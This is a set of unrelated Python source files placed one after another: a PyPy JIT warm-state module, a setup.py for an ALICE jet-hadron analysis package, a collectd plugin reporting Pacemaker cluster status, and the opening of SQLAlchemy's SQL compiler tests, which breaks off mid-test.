<gh_stars>1-10 import sys, weakref from rpython.rtyper.lltypesystem import lltype, llmemory, rstr, rffi from rpython.rtyper.ootypesystem import ootype from rpython.rtyper.annlowlevel import hlstr, cast_base_ptr_to_instance from rpython.rtyper.annlowlevel import cast_object_to_ptr from rpython.rlib.objectmodel import specialize, we_are_translated, r_dict from rpython.rlib.rarithmetic import intmask from rpython.rlib.nonconst import NonConstant from rpython.rlib.unroll import unrolling_iterable from rpython.rlib.jit import PARAMETERS from rpython.rlib.jit import BaseJitCell from rpython.rlib.debug import debug_start, debug_stop, debug_print from rpython.jit.metainterp import history from rpython.jit.codewriter import support, heaptracker, longlong from rpython.tool.sourcetools import func_with_new_name # ____________________________________________________________ @specialize.arg(0) def specialize_value(TYPE, x): """'x' must be a Signed, a GCREF or a FLOATSTORAGE. This function casts it to a more specialized type, like Char or Ptr(..). """ INPUT = lltype.typeOf(x) if INPUT is lltype.Signed: if isinstance(TYPE, lltype.Ptr) and TYPE.TO._gckind == 'raw': # non-gc pointer return rffi.cast(TYPE, x) elif TYPE is lltype.SingleFloat: return longlong.int2singlefloat(x) else: return lltype.cast_primitive(TYPE, x) elif INPUT is longlong.FLOATSTORAGE: if longlong.is_longlong(TYPE): return rffi.cast(TYPE, x) assert TYPE is lltype.Float return longlong.getrealfloat(x) else: return lltype.cast_opaque_ptr(TYPE, x) @specialize.ll() def unspecialize_value(value): """Casts 'value' to a Signed, a GCREF or a FLOATSTORAGE.""" if isinstance(lltype.typeOf(value), lltype.Ptr): if lltype.typeOf(value).TO._gckind == 'gc': return lltype.cast_opaque_ptr(llmemory.GCREF, value) else: adr = llmemory.cast_ptr_to_adr(value) return heaptracker.adr2int(adr) elif isinstance(lltype.typeOf(value), ootype.OOType): return ootype.cast_to_object(value) elif isinstance(value, float): return longlong.getfloatstorage(value) else: return lltype.cast_primitive(lltype.Signed, value) @specialize.arg(0) def unwrap(TYPE, box): if TYPE is lltype.Void: return None if isinstance(TYPE, lltype.Ptr): if TYPE.TO._gckind == "gc": return box.getref(TYPE) else: return llmemory.cast_adr_to_ptr(box.getaddr(), TYPE) if isinstance(TYPE, ootype.OOType): return box.getref(TYPE) if TYPE == lltype.Float: return box.getfloat() else: return lltype.cast_primitive(TYPE, box.getint()) @specialize.ll() def wrap(cpu, value, in_const_box=False): if isinstance(lltype.typeOf(value), lltype.Ptr): if lltype.typeOf(value).TO._gckind == 'gc': value = lltype.cast_opaque_ptr(llmemory.GCREF, value) if in_const_box: return history.ConstPtr(value) else: return history.BoxPtr(value) else: adr = llmemory.cast_ptr_to_adr(value) value = heaptracker.adr2int(adr) # fall through to the end of the function elif isinstance(lltype.typeOf(value), ootype.OOType): value = ootype.cast_to_object(value) if in_const_box: return history.ConstObj(value) else: return history.BoxObj(value) elif (isinstance(value, float) or longlong.is_longlong(lltype.typeOf(value))): if isinstance(value, float): value = longlong.getfloatstorage(value) else: value = rffi.cast(lltype.SignedLongLong, value) if in_const_box: return history.ConstFloat(value) else: return history.BoxFloat(value) elif isinstance(value, str) or isinstance(value, unicode): assert len(value) == 1 # must be a character value = ord(value) elif lltype.typeOf(value) is lltype.SingleFloat: value = longlong.singlefloat2int(value) else: value = intmask(value) if in_const_box: return history.ConstInt(value) else: return history.BoxInt(value) @specialize.arg(0) def equal_whatever(TYPE, x, y): if isinstance(TYPE, lltype.Ptr): if TYPE.TO is rstr.STR or TYPE.TO is rstr.UNICODE: return rstr.LLHelpers.ll_streq(x, y) if TYPE is ootype.String or TYPE is ootype.Unicode: return x.ll_streq(y) return x == y @specialize.arg(0) def hash_whatever(TYPE, x): # Hash of lltype or ootype object. # Only supports strings, unicodes and regular instances, # as well as primitives that can meaningfully be cast to Signed. if isinstance(TYPE, lltype.Ptr) and TYPE.TO._gckind == 'gc': if TYPE.TO is rstr.STR or TYPE.TO is rstr.UNICODE: return rstr.LLHelpers.ll_strhash(x) # assumed not null else: if x: return lltype.identityhash(x) else: return 0 elif TYPE is ootype.String or TYPE is ootype.Unicode: return x.ll_hash() elif isinstance(TYPE, ootype.OOType): if x: return ootype.identityhash(x) else: return 0 else: return rffi.cast(lltype.Signed, x) class JitCell(BaseJitCell): # the counter can mean the following things: # counter >= 0: not yet traced, wait till threshold is reached # counter == -1: there is an entry bridge for this cell # counter == -2: tracing is currently going on for this cell counter = 0 dont_trace_here = False extra_delay = chr(0) wref_procedure_token = None def get_procedure_token(self): if self.wref_procedure_token is not None: token = self.wref_procedure_token() if token and not token.invalidated: return token return None def set_procedure_token(self, token): self.wref_procedure_token = self._makeref(token) def _makeref(self, token): assert token is not None return weakref.ref(token) # ____________________________________________________________ class WarmEnterState(object): THRESHOLD_LIMIT = sys.maxint // 2 def __init__(self, warmrunnerdesc, jitdriver_sd): "NOT_RPYTHON" self.warmrunnerdesc = warmrunnerdesc self.jitdriver_sd = jitdriver_sd if warmrunnerdesc is not None: # for tests self.cpu = warmrunnerdesc.cpu try: self.profiler = warmrunnerdesc.metainterp_sd.profiler except AttributeError: # for tests self.profiler = None # initialize the state with the default values of the # parameters specified in rlib/jit.py for name, default_value in PARAMETERS.items(): meth = getattr(self, 'set_param_' + name) meth(default_value) def _compute_threshold(self, threshold): if threshold <= 0: return 0 # never reach the THRESHOLD_LIMIT if threshold < 2: threshold = 2 return (self.THRESHOLD_LIMIT // threshold) + 1 # the number is at least 1, and at most about half THRESHOLD_LIMIT def set_param_threshold(self, threshold): self.increment_threshold = self._compute_threshold(threshold) def set_param_function_threshold(self, threshold): self.increment_function_threshold = self._compute_threshold(threshold) def set_param_trace_eagerness(self, value): self.trace_eagerness = value def set_param_trace_limit(self, value): self.trace_limit = value def set_param_inlining(self, value): self.inlining = value def set_param_enable_opts(self, value): from rpython.jit.metainterp.optimizeopt import ALL_OPTS_DICT, ALL_OPTS_NAMES d = {} if NonConstant(False): value = 'blah' # not a constant '' if value is None or value == 'all': value = ALL_OPTS_NAMES for name in value.split(":"): if name: if name not in ALL_OPTS_DICT: raise ValueError('Unknown optimization ' + name) d[name] = None self.enable_opts = d def set_param_loop_longevity(self, value): # note: it's a global parameter, not a per-jitdriver one if (self.warmrunnerdesc is not None and self.warmrunnerdesc.memory_manager is not None): # all for tests self.warmrunnerdesc.memory_manager.set_max_age(value) def set_param_retrace_limit(self, value): if self.warmrunnerdesc: if self.warmrunnerdesc.memory_manager: self.warmrunnerdesc.memory_manager.retrace_limit = value def set_param_max_retrace_guards(self, value): if self.warmrunnerdesc: if self.warmrunnerdesc.memory_manager: self.warmrunnerdesc.memory_manager.max_retrace_guards = value def set_param_max_unroll_loops(self, value): if self.warmrunnerdesc: if self.warmrunnerdesc.memory_manager: self.warmrunnerdesc.memory_manager.max_unroll_loops = value def disable_noninlinable_function(self, greenkey): cell = self.jit_cell_at_key(greenkey) cell.dont_trace_here = True debug_start("jit-disableinlining") loc = self.get_location_str(greenkey) debug_print("disabled inlining", loc) debug_stop("jit-disableinlining") def attach_procedure_to_interp(self, greenkey, procedure_token): cell = self.jit_cell_at_key(greenkey) old_token = cell.get_procedure_token() cell.set_procedure_token(procedure_token) cell.counter = -1 # valid procedure bridge attached if old_token is not None: self.cpu.redirect_call_assembler(old_token, procedure_token) # procedure_token is also kept alive by any loop that used # to point to old_token. Actually freeing old_token early # is a pointless optimization (it is tiny). old_token.record_jump_to(procedure_token) # ---------- def make_entry_point(self): "NOT_RPYTHON" if hasattr(self, 'maybe_compile_and_run'): return self.maybe_compile_and_run warmrunnerdesc = self.warmrunnerdesc metainterp_sd = warmrunnerdesc.metainterp_sd jitdriver_sd = self.jitdriver_sd vinfo = jitdriver_sd.virtualizable_info index_of_virtualizable = jitdriver_sd.index_of_virtualizable num_green_args = jitdriver_sd.num_green_args get_jitcell = self.make_jitcell_getter() self.make_jitdriver_callbacks() confirm_enter_jit = self.confirm_enter_jit range_red_args = unrolling_iterable( range(num_green_args, num_green_args + jitdriver_sd.num_red_args)) # get a new specialized copy of the method ARGS = [] for kind in jitdriver_sd.red_args_types: if kind == 'int': ARGS.append(lltype.Signed) elif kind == 'ref': ARGS.append(llmemory.GCREF) elif kind == 'float': ARGS.append(longlong.FLOATSTORAGE) else: assert 0, kind func_execute_token = self.cpu.make_execute_token(*ARGS) cpu = self.cpu def execute_assembler(loop_token, *args): # Call the backend to run the 'looptoken' with the given # input args. deadframe = func_execute_token(loop_token, *args) # # If we have a virtualizable, we have to reset its # 'vable_token' field afterwards if vinfo is not None: virtualizable = args[index_of_virtualizable] virtualizable = vinfo.cast_gcref_to_vtype(virtualizable) vinfo.reset_vable_token(virtualizable) # # Record in the memmgr that we just ran this loop, # so that it will keep it alive for a longer time warmrunnerdesc.memory_manager.keep_loop_alive(loop_token) # # Handle the failure fail_descr = cpu.get_latest_descr(deadframe) fail_descr.handle_fail(deadframe, metainterp_sd, jitdriver_sd) # assert 0, "should have raised" def bound_reached(cell, *args): # bound reached, but we do a last check: if it is the first # time we reach the bound, or if another loop or bridge was # compiled since the last time we reached it, then decrease # the counter by a few percents instead. It should avoid # sudden bursts of JIT-compilation, and also corner cases # where we suddenly compile more than one loop because all # counters reach the bound at the same time, but where # compiling all but the first one is pointless. curgen = warmrunnerdesc.memory_manager.current_generation curgen = chr(intmask(curgen) & 0xFF) # only use 8 bits if we_are_translated() and curgen != cell.extra_delay: cell.counter = int(self.THRESHOLD_LIMIT * 0.98) cell.extra_delay = curgen return # if not confirm_enter_jit(*args): cell.counter = 0 return # start tracing from rpython.jit.metainterp.pyjitpl import MetaInterp metainterp = MetaInterp(metainterp_sd, jitdriver_sd) # set counter to -2, to mean "tracing in effect" cell.counter = -2 try: metainterp.compile_and_run_once(jitdriver_sd, *args) finally: if cell.counter == -2: cell.counter = 0 def maybe_compile_and_run(threshold, *args): """Entry point to the JIT. Called at the point with the can_enter_jit() hint. """ # look for the cell corresponding to the current greenargs greenargs = args[:num_green_args] cell = get_jitcell(True, *greenargs) if cell.counter >= 0: # update the profiling counter n = cell.counter + threshold if n <= self.THRESHOLD_LIMIT: # bound not reached cell.counter = n return else: bound_reached(cell, *args) return else: if cell.counter != -1: assert cell.counter == -2 # tracing already happening in some outer invocation of # this function. don't trace a second time. return if not confirm_enter_jit(*args): return # machine code was already compiled for these greenargs procedure_token = cell.get_procedure_token() if procedure_token is None: # it was a weakref that has been freed cell.counter = 0 return # extract and unspecialize the red arguments to pass to # the assembler execute_args = () for i in range_red_args: execute_args += (unspecialize_value(args[i]), ) # run it! this executes until interrupted by an exception execute_assembler(procedure_token, *execute_args) # assert 0, "should not reach this point" maybe_compile_and_run._dont_inline_ = True self.maybe_compile_and_run = maybe_compile_and_run self.execute_assembler = execute_assembler return maybe_compile_and_run # ---------- def make_unwrap_greenkey(self): "NOT_RPYTHON" if hasattr(self, 'unwrap_greenkey'): return self.unwrap_greenkey # jitdriver_sd = self.jitdriver_sd green_args_spec = unrolling_iterable(jitdriver_sd._green_args_spec) # def unwrap_greenkey(greenkey): greenargs = () i = 0 for TYPE in green_args_spec: greenbox = greenkey[i] assert isinstance(greenbox, history.Const) value = unwrap(TYPE, greenbox) greenargs += (value,) i = i + 1 return greenargs # unwrap_greenkey._always_inline_ = True self.unwrap_greenkey = unwrap_greenkey return unwrap_greenkey # ---------- def make_jitcell_getter(self): "NOT_RPYTHON" if hasattr(self, 'jit_getter'): return self.jit_getter # if self.jitdriver_sd._get_jitcell_at_ptr is None: jit_getter = self._make_jitcell_getter_default() else: jit_getter = self._make_jitcell_getter_custom() # unwrap_greenkey = self.make_unwrap_greenkey() # def jit_cell_at_key(greenkey): greenargs = unwrap_greenkey(greenkey) return jit_getter(True, *greenargs) self.jit_cell_at_key = jit_cell_at_key self.jit_getter = jit_getter # return jit_getter def _make_jitcell_getter_default(self): "NOT_RPYTHON" jitdriver_sd = self.jitdriver_sd green_args_spec = unrolling_iterable(jitdriver_sd._green_args_spec) # def comparekey(greenargs1, greenargs2): i = 0 for TYPE in green_args_spec: if not equal_whatever(TYPE, greenargs1[i], greenargs2[i]): return False i = i + 1 return True # def hashkey(greenargs): x = 0x345678 i = 0 for TYPE in green_args_spec: item = greenargs[i] y = hash_whatever(TYPE, item) x = intmask((1000003 * x) ^ y) i = i + 1 return x # jitcell_dict = r_dict(comparekey, hashkey) try: self.warmrunnerdesc.stats.jitcell_dicts.append(jitcell_dict) except AttributeError: pass # def _cleanup_dict(): minimum = self.THRESHOLD_LIMIT // 20 # minimum 5% killme = [] for key, cell in jitcell_dict.iteritems(): if cell.counter >= 0: cell.counter = int(cell.counter * 0.92) if cell.counter < minimum: killme.append(key) elif (cell.counter == -1 and cell.get_procedure_token() is None): killme.append(key) for key in killme: del jitcell_dict[key] # def _maybe_cleanup_dict(): # Once in a while, rarely, when too many entries have # been put in the jitdict_dict, we do a cleanup phase: # we decay all counters and kill entries with a too # low counter. self._trigger_automatic_cleanup += 1 if self._trigger_automatic_cleanup > 20000: self._trigger_automatic_cleanup = 0 _cleanup_dict() # self._trigger_automatic_cleanup = 0 self._jitcell_dict = jitcell_dict # for tests # def get_jitcell(build, *greenargs): try: cell = jitcell_dict[greenargs] except KeyError: if not build: return None _maybe_cleanup_dict() cell = JitCell() jitcell_dict[greenargs] = cell return cell return get_jitcell def _make_jitcell_getter_custom(self): "NOT_RPYTHON" rtyper = self.warmrunnerdesc.rtyper get_jitcell_at_ptr = self.jitdriver_sd._get_jitcell_at_ptr set_jitcell_at_ptr = self.jitdriver_sd._set_jitcell_at_ptr lltohlhack = {} # note that there is no equivalent of _maybe_cleanup_dict() # in the case of custom getters. We assume that the interpreter # stores the JitCells on some objects that can go away by GC, # like the PyCode objects in PyPy. # def get_jitcell(build, *greenargs): fn = support.maybe_on_top_of_llinterp(rtyper, get_jitcell_at_ptr) cellref = fn(*greenargs) # <hacks> if we_are_translated(): BASEJITCELL = lltype.typeOf(cellref) cell = cast_base_ptr_to_instance(JitCell, cellref) else: if isinstance(cellref, (BaseJitCell, type(None))): BASEJITCELL = None cell = cellref else: BASEJITCELL = lltype.typeOf(cellref) if cellref: cell = lltohlhack[rtyper.type_system.deref(cellref)] else: cell = None if not build: return cell if cell is None: cell = JitCell() # <hacks> if we_are_translated(): cellref = cast_object_to_ptr(BASEJITCELL, cell) else: if BASEJITCELL is None: cellref = cell else: if isinstance(BASEJITCELL, lltype.Ptr): cellref = lltype.malloc(BASEJITCELL.TO) elif isinstance(BASEJITCELL, ootype.Instance): cellref = ootype.new(BASEJITCELL) else: assert False, "no clue" lltohlhack[rtyper.type_system.deref(cellref)] = cell # </hacks> fn = support.maybe_on_top_of_llinterp(rtyper, set_jitcell_at_ptr) fn(cellref, *greenargs) return cell return get_jitcell # ---------- def make_jitdriver_callbacks(self): if hasattr(self, 'get_location_str'): return # warmrunnerdesc = self.warmrunnerdesc unwrap_greenkey = self.make_unwrap_greenkey() jit_getter = self.make_jitcell_getter() jd = self.jitdriver_sd cpu = self.cpu def can_inline_greenargs(*greenargs): if can_never_inline(*greenargs): return False cell = jit_getter(False, *greenargs) if cell is not None and cell.dont_trace_here: return False return True def can_inline_callable(greenkey): greenargs = unwrap_greenkey(greenkey) return can_inline_greenargs(*greenargs) self.can_inline_greenargs = can_inline_greenargs self.can_inline_callable = can_inline_callable if jd._should_unroll_one_iteration_ptr is None: def should_unroll_one_iteration(greenkey): return False else: rtyper = self.warmrunnerdesc.rtyper inline_ptr = jd._should_unroll_one_iteration_ptr def should_unroll_one_iteration(greenkey): greenargs = unwrap_greenkey(greenkey) fn = support.maybe_on_top_of_llinterp(rtyper, inline_ptr) return fn(*greenargs) self.should_unroll_one_iteration = should_unroll_one_iteration redargtypes = ''.join([kind[0] for kind in jd.red_args_types]) def get_assembler_token(greenkey): cell = self.jit_cell_at_key(greenkey) procedure_token = cell.get_procedure_token() if procedure_token is None: from rpython.jit.metainterp.compile import compile_tmp_callback if cell.counter == -1: # used to be a valid entry bridge, cell.counter = 0 # but was freed in the meantime. memmgr = warmrunnerdesc.memory_manager procedure_token = compile_tmp_callback(cpu, jd, greenkey, redargtypes, memmgr) cell.set_procedure_token(procedure_token) return procedure_token self.get_assembler_token = get_assembler_token # get_location_ptr = self.jitdriver_sd._get_printable_location_ptr if get_location_ptr is None: missing = '(no jitdriver.get_printable_location!)' def get_location_str(greenkey): return missing else: rtyper = self.warmrunnerdesc.rtyper unwrap_greenkey = self.make_unwrap_greenkey() # def get_location_str(greenkey): greenargs = unwrap_greenkey(greenkey) fn = support.maybe_on_top_of_llinterp(rtyper, get_location_ptr) llres = fn(*greenargs) if not we_are_translated() and isinstance(llres, str): return llres return hlstr(llres) self.get_location_str = get_location_str # confirm_enter_jit_ptr = self.jitdriver_sd._confirm_enter_jit_ptr if confirm_enter_jit_ptr is None: def confirm_enter_jit(*args): return True else: rtyper = self.warmrunnerdesc.rtyper # def confirm_enter_jit(*args): fn = support.maybe_on_top_of_llinterp(rtyper, confirm_enter_jit_ptr) return fn(*args) self.confirm_enter_jit = confirm_enter_jit # can_never_inline_ptr = self.jitdriver_sd._can_never_inline_ptr if can_never_inline_ptr is None: def can_never_inline(*greenargs): return False else: rtyper = self.warmrunnerdesc.rtyper # def can_never_inline(*greenargs): fn = support.maybe_on_top_of_llinterp(rtyper, can_never_inline_ptr) return fn(*greenargs) self.can_never_inline = can_never_inline
#/usr/bin/env python # Setup Jet-H analysis # Derived from the setup.py in aliBuild and Overwatch # and based on: https://python-packaging.readthedocs.io/en/latest/index.html # Always prefer setuptools over distutils from setuptools import setup, find_packages # To use a consistent encoding from codecs import open import os from typing import Any, cast, Dict def get_version() -> str: version_module: Dict[str, Any] = {} with open(os.path.join("jet_hadron", "version.py")) as f: exec(f.read(), version_module) return cast(str, version_module["__version__"]) # Get the long description from the README file here = os.path.abspath(os.path.dirname(__file__)) with open(os.path.join(here, 'README.md'), encoding='utf-8') as f: long_description = f.read() setup( name="alice_jet_hadron_correlations", version=get_version(), description="ALICE jet-hadron correlations analysis", long_description=long_description, long_description_content_type="text/markdown", author="<NAME>", author_email="<EMAIL>", url="https://github.com/raymondEhlers/alice-jet-hadron", license="BSD 3-Clause", # See https://pypi.python.org/pypi?%3Aaction=list_classifiers classifiers=[ # How mature is this project? Common values are # 3 - Alpha # 4 - Beta # 5 - Production/Stable 'Development Status :: 4 - Beta', # Indicate who your project is intended for 'Intended Audience :: Science/Research', # Specify the Python versions you support here. In particular, ensure # that you indicate whether you support Python 2, Python 3 or both. 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7' ], # What does your project relate to? keywords='HEP ALICE', packages=find_packages(exclude=(".git", "tests")), # Rename scripts to the desired executable names # See: https://stackoverflow.com/a/8506532 entry_points = { "console_scripts": [ "jetHCorrelations = jet_hadron.analysis.correlations:run_from_terminal", "jetHResponse = jet_hadron.analysis.response_matrix:run_from_terminal", "starResponse = jet_hadron.analysis.STAR_response_matrix:run_from_terminal", "plotEMCalCorrections = jet_hadron.analysis.EMCal_analysis_tasks:run_plot_EMCal_corrections_hists_from_terminal", "plotEMCalEmbedding = jet_hadron.analysis.EMCal_analysis_tasks:run_plot_EMCal_embedding_hists_from_terminal", "plotRPFRegions = jet_hadron.plot.highlight_RPF:run_from_terminal", "mixedEventSystematics = jet_hadron.analysis.systematics:run_mixed_event_systematics_from_terminal", ], }, # This is usually the minimal set of the required packages. # Packages should be installed via pip -r requirements.txt ! install_requires=[ # Pinned version because the typing information doesn't seem right, # at least with how I understand it. "ruamel.yaml<0.15.99", "IPython", "scipy", "numpy", "matplotlib", "seaborn", "numdifftools", "pachyderm<3.0", "reaction_plane_fit>3.1", "coloredlogs", "enlighten", "numpythia", "pyjet", "joblib", ], # Include additional files include_package_data=True, extras_require = { "tests": [ "pytest", "pytest-cov", "pytest-mock", "codecov", ], "docs": [ "sphinx", # Allow markdown files to be used "recommonmark", # Allow markdown tables to be used "sphinx_markdown_tables", ], "dev": [ "pre-commit", "flake8", # Makes flake8 easier to parse "flake8-colors", "mypy", "yamllint", ] } )
import collectd import os LOG_FILE_PATH = '/var/log/containers/stdouts/collectd_pacemaker.out' PIPE_FILE_PATH = '/collectd_pipe' INTERVAL = 15 def config_func(config): log_file_path_set = False for node in config.children: key = node.key.lower() if key == 'interval': global INTERVAL INTERVAL = int(node.values[0]) def read_func(): global INTERVAL global LOG_FILE_PATH os.system('''echo "pcs status" > '''+PIPE_FILE_PATH) with open(LOG_FILE_PATH, 'rb') as f: full_output = [line.decode("utf-8") for line in f.readlines()] latest_output = [] for line in full_output[-1::-1]: latest_output.append(line) if "Cluster name:" in line: break components_list = ["total_nodes", "online_nodes", "online_guests", "resource_instances", "haproxy_resource_total_count", "galera_resource_total_count", "rabbitmq_resource_total_count", "redis_resource_total_count", "ovn_resource_total_count", "cinder_resource_total_count", "haproxy_resource_master_count", "galera_resource_master_count", "rabbitmq_resource_master_count", "redis_resource_master_count", "ovn_resource_master_count", "cinder_resource_master_count", "corosync_daemon_status", "pacemaker_daemon_status", "pcsd_daemon_status", "haproxy_resource_failures", "galera_resource_failures", "rabbitmq_resource_failures", "redis_resource_failures", "ovn_resource_failures", "cinder_resource_failures"] for component in components_list: if component == "total_nodes": for line in latest_output[-1::-1]: if "nodes configured" in line: line_split = line.split() nodes_index = line_split.index("nodes") val = int(line_split[nodes_index-1]) break elif component == "online_nodes": for line in latest_output[-1::-1]: if "Online: [" in line and "Guest" not in line: line_split = line.split("[")[1].replace(" ]","").strip().split() val = int(len(line_split)) elif component == "online_guests": for line in latest_output[-1::-1]: if "GuestOnline: [" in line: line_split = line.split("[")[1].replace(" ]","").strip().split() val = int(len(line_split)) elif component == "resource_instances": for line in latest_output[-1::-1]: if "resource instances configured" in line: line_split = line.split() nodes_index = line_split.index("resource") val = int(line_split[nodes_index-1]) elif "resource_total_count" in component: resource = component.split("_")[0] val = 0 # Flag to make sure that failures are not counted # in resource total count. is_failures_total = False for line in latest_output[-1::-1]: if "Failed" in line: is_failures_total = True if (resource == "haproxy" or resource == "galera" or resource == "rabbitmq" or resource == "redis"): if resource+"-bundle-" in line and "Guest" not in line and not is_failures_total: val += 1 if resource == "ovn": if "ovn-dbs-bundle-" in line and "Guest" not in line and not is_failures_total: val += 1 if resource == "cinder": if "openstack-cinder-volume-" in line and "Guest" not in line and not is_failures_total: val += 1 if is_failures_total and "Daemon Status" in line: is_failures_total = False elif "resource_master_count" in component: resource = component.split("_")[0] val = 0 # Flag to make sure that failures are not counted # in resource master count is_failures_master = False for line in latest_output[-1::-1]: if "Failed" in line: is_failures_master = True if (resource == "haproxy" or resource == "galera" or resource == "rabbitmq" or resource == "redis"): if resource+"-bundle-" in line and "Master" in line and not is_failures_master: val += 1 if resource == "ovn": if "ovn-dbs-bundle-" in line and "Master" in line and not is_failures_master: val += 1 if resource == "cinder": if "openstack-cinder-volume-" in line and "Master" in line and not is_failures_master: val += 1 if is_failures_master and "Daemon Status" in line: is_failures_master = False if "daemon_status" in component: daemon = component.split("_")[0] val = 0 for line in latest_output: if daemon+":" in line and "active/enabled" in line: val = 1 break if "resource_failures" in component: resource = component.split("_")[0] val = 0 is_failures = False for line in latest_output[-1::-1]: if "Failed" in line: is_failures = True if resource in line and is_failures: val += 1 if is_failures and "Daemon Status" in line: is_failures = False metric = collectd.Values() metric.plugin = 'pacemaker_monitoring' metric.interval = INTERVAL metric.type = 'gauge' metric.type_instance = component metric.values = [val] metric.dispatch() collectd.register_config(config_func) collectd.register_read(read_func)
<gh_stars>0 #! coding:utf-8 """ compiler tests. These tests are among the very first that were written when SQLAlchemy began in 2005. As a result the testing style here is very dense; it's an ongoing job to break these into much smaller tests with correct pep8 styling and coherent test organization. """ import decimal from sqlalchemy import alias from sqlalchemy import and_ from sqlalchemy import asc from sqlalchemy import bindparam from sqlalchemy import Boolean from sqlalchemy import case from sqlalchemy import cast from sqlalchemy import CheckConstraint from sqlalchemy import Column from sqlalchemy import Date from sqlalchemy import desc from sqlalchemy import distinct from sqlalchemy import exc from sqlalchemy import except_ from sqlalchemy import exists from sqlalchemy import Float from sqlalchemy import func from sqlalchemy import Integer from sqlalchemy import intersect from sqlalchemy import join from sqlalchemy import literal from sqlalchemy import literal_column from sqlalchemy import MetaData from sqlalchemy import not_ from sqlalchemy import null from sqlalchemy import Numeric from sqlalchemy import or_ from sqlalchemy import outerjoin from sqlalchemy import over from sqlalchemy import schema from sqlalchemy import select from sqlalchemy import Sequence from sqlalchemy import sql from sqlalchemy import String from sqlalchemy import subquery from sqlalchemy import Table from sqlalchemy import Text from sqlalchemy import text from sqlalchemy import TIMESTAMP from sqlalchemy import true from sqlalchemy import tuple_ from sqlalchemy import type_coerce from sqlalchemy import types from sqlalchemy import union from sqlalchemy import union_all from sqlalchemy import util from sqlalchemy.dialects import mysql from sqlalchemy.dialects import oracle from sqlalchemy.dialects import postgresql from sqlalchemy.dialects import sqlite from sqlalchemy.dialects import sybase from sqlalchemy.dialects.postgresql.base import PGCompiler from sqlalchemy.dialects.postgresql.base import PGDialect from sqlalchemy.engine import default from sqlalchemy.ext.compiler import compiles from sqlalchemy.sql import column from sqlalchemy.sql import compiler from sqlalchemy.sql import label from sqlalchemy.sql import table from sqlalchemy.sql.expression import _literal_as_text from sqlalchemy.sql.expression import ClauseList from sqlalchemy.sql.expression import HasPrefixes from sqlalchemy.testing import assert_raises from sqlalchemy.testing import assert_raises_message from sqlalchemy.testing import AssertsCompiledSQL from sqlalchemy.testing import eq_ from sqlalchemy.testing import eq_ignore_whitespace from sqlalchemy.testing import fixtures from sqlalchemy.testing import is_ from sqlalchemy.util import u table1 = table( "mytable", column("myid", Integer), column("name", String), column("description", String), ) table2 = table( "myothertable", column("otherid", Integer), column("othername", String) ) table3 = table( "thirdtable", column("userid", Integer), column("otherstuff", String) ) metadata = MetaData() # table with a schema table4 = Table( "remotetable", metadata, Column("rem_id", Integer, primary_key=True), Column("datatype_id", Integer), Column("value", String(20)), schema="remote_owner", ) # table with a 'multipart' schema table5 = Table( "remotetable", metadata, Column("rem_id", Integer, primary_key=True), Column("datatype_id", Integer), Column("value", String(20)), schema="dbo.remote_owner", ) users = table( "users", column("user_id"), column("user_name"), column("password") ) addresses = table( "addresses", column("address_id"), column("user_id"), column("street"), column("city"), column("state"), column("zip"), ) keyed = Table( "keyed", metadata, Column("x", Integer, key="colx"), Column("y", Integer, key="coly"), Column("z", Integer), ) class SelectTest(fixtures.TestBase, AssertsCompiledSQL): __dialect__ = "default" def test_attribute_sanity(self): assert hasattr(table1, "c") assert hasattr(table1.select(), "c") assert not hasattr(table1.c.myid.self_group(), "columns") assert hasattr(table1.select().self_group(), "columns") assert not hasattr(table1.c.myid, "columns") assert not hasattr(table1.c.myid, "c") assert not hasattr(table1.select().c.myid, "c") assert not hasattr(table1.select().c.myid, "columns") assert not hasattr(table1.alias().c.myid, "columns") assert not hasattr(table1.alias().c.myid, "c") if util.compat.py32: assert_raises_message( exc.InvalidRequestError, "Scalar Select expression has no " "columns; use this object directly within a " "column-level expression.", lambda: hasattr( select([table1.c.myid]).as_scalar().self_group(), "columns" ), ) assert_raises_message( exc.InvalidRequestError, "Scalar Select expression has no " "columns; use this object directly within a " "column-level expression.", lambda: hasattr( select([table1.c.myid]).as_scalar(), "columns" ), ) else: assert not hasattr( select([table1.c.myid]).as_scalar().self_group(), "columns" ) assert not hasattr(select([table1.c.myid]).as_scalar(), "columns") def test_prefix_constructor(self): class Pref(HasPrefixes): def _generate(self): return self assert_raises( exc.ArgumentError, Pref().prefix_with, "some prefix", not_a_dialect=True, ) def test_table_select(self): self.assert_compile( table1.select(), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable", ) self.assert_compile( select([table1, table2]), "SELECT mytable.myid, mytable.name, mytable.description, " "myothertable.otherid, myothertable.othername FROM mytable, " "myothertable", ) def test_invalid_col_argument(self): assert_raises(exc.ArgumentError, select, table1) assert_raises(exc.ArgumentError, select, table1.c.myid) def test_int_limit_offset_coercion(self): for given, exp in [ ("5", 5), (5, 5), (5.2, 5), (decimal.Decimal("5"), 5), (None, None), ]: eq_(select().limit(given)._limit, exp) eq_(select().offset(given)._offset, exp) eq_(select(limit=given)._limit, exp) eq_(select(offset=given)._offset, exp) assert_raises(ValueError, select().limit, "foo") assert_raises(ValueError, select().offset, "foo") assert_raises(ValueError, select, offset="foo") assert_raises(ValueError, select, limit="foo") def test_limit_offset_no_int_coercion_one(self): exp1 = literal_column("Q") exp2 = literal_column("Y") self.assert_compile( select([1]).limit(exp1).offset(exp2), "SELECT 1 LIMIT Q OFFSET Y" ) self.assert_compile( select([1]).limit(bindparam("x")).offset(bindparam("y")), "SELECT 1 LIMIT :x OFFSET :y", ) def test_limit_offset_no_int_coercion_two(self): exp1 = literal_column("Q") exp2 = literal_column("Y") sel = select([1]).limit(exp1).offset(exp2) assert_raises_message( exc.CompileError, "This SELECT structure does not use a simple integer " "value for limit", getattr, sel, "_limit", ) assert_raises_message( exc.CompileError, "This SELECT structure does not use a simple integer " "value for offset", getattr, sel, "_offset", ) def test_limit_offset_no_int_coercion_three(self): exp1 = bindparam("Q") exp2 = bindparam("Y") sel = select([1]).limit(exp1).offset(exp2) assert_raises_message( exc.CompileError, "This SELECT structure does not use a simple integer " "value for limit", getattr, sel, "_limit", ) assert_raises_message( exc.CompileError, "This SELECT structure does not use a simple integer " "value for offset", getattr, sel, "_offset", ) def test_limit_offset(self): for lim, offset, exp, params in [ ( 5, 10, "LIMIT :param_1 OFFSET :param_2", {"param_1": 5, "param_2": 10}, ), (None, 10, "LIMIT -1 OFFSET :param_1", {"param_1": 10}), (5, None, "LIMIT :param_1", {"param_1": 5}), ( 0, 0, "LIMIT :param_1 OFFSET :param_2", {"param_1": 0, "param_2": 0}, ), ]: self.assert_compile( select([1]).limit(lim).offset(offset), "SELECT 1 " + exp, 